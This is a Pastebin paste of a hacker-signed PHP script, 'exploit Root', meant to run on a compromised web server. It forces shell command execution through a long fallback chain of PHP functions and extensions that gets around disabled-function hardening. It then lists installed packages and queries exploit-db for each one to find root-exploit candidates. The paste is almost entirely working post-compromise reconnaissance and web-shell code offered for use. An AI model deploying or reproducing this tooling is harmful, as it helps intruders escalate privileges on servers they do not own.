Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <meta content="text/html; charset=ISO-8859-1"
- http-equiv="content-type">
- <title>exploit Root ~ JxH</title>
- </head>
- <body>
- <div style="text-align: center;">JaBr<span style="color: red;">O</span>t
- HaCkEr<br>
- Om4rJxH@gmail.com<br>
- </div>
- </body>
- </html>
- <ol>
- <strong>
- <?
- #c0d3r : Al7rby
- #Rights : JaBrOt HaCkEr ~ Om4rJxH@gmail.com
- @set_time_limit(0);
- @error_reporting(E_ALL | E_NOTICE);
- echo "<pre>";
- @unlink("jxh.txt");
- execute("yum list installed |awk {' print $1 '} |awk -F'.' {' print $1 '} > jxh.txt");
- $apps = @file('jxh.txt');
- (!$apps) ? die("Error::jxh.txt Not Exist , Means Can't execute with PHP ."):"";
- echo "<p># There is : [".count($apps)."] Application</p>";
- foreach($apps as $app){
- $app = str_replace(array("\n","\r"),"",$app);
- echo (exploit_db($app)) ? "[+] Found ( <b>$app</b> ) : <a href=http://www.exploit-db.com/search/?action=search&filter_description=$app>here</a>\n":"[-] Not Found ( $app )\n";
- }
- function exploit_db($wht){
- $result = @file_get_contents("http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$wht&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
- flush();flush();
- return (eregi("No results",$result)) ? false:true;
- }
- function execute($command)
- {
- global $os;
- if(function_exists('passthru')){$exec = passthru($command);}
- elseif(function_exists('system') && !$exec){$exec= system($command); }
- elseif(function_exists('exec') && !$exec){exec($command,$output);$exec=join("\n",$output);}
- elseif(function_exists('shell_exec') && !$exec){$exec=shell_exec($command);}
- elseif(function_exists('popen') && !$exec){$fp = popen($command,"r");
- {while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}$exec = convert_cyr_string($result,"d","w");}
- elseif(function_exists('win_shell_execute') && !$exec){$exec = winshell($command);}
- elseif(function_exists('win32_create_service') && !$exec){$exec=srvshell($command);}
- elseif(extension_loaded('ffi') && !$exec){$exec=ffishell($command);}
- elseif(extension_loaded('perl') && !$exec){$exec=perlshell($command);}
- elseif(!$exec) {$exec = slashBypass($command);}
- elseif(!$exec && extension_loaded('python'))
- {$exec = python_eval("import os
- pwd = os.getcwd()
- print pwd
- os.system('".$command."')");}
- elseif($exec){return $exec;}
- }
- ?>
- </strong>
- </ol>
- <html>
- <head>
- <title></title>
- </head>
- <body>
- <div style="text-align: center;">© <span style="font-weight: bold;">J<span
- style="color: red;">x</span>H</span> 2010<br>
- </div>
- <div style="text-align: center;"></div>
- </body>
- </html>
Add Comment
Please, Sign In to add comment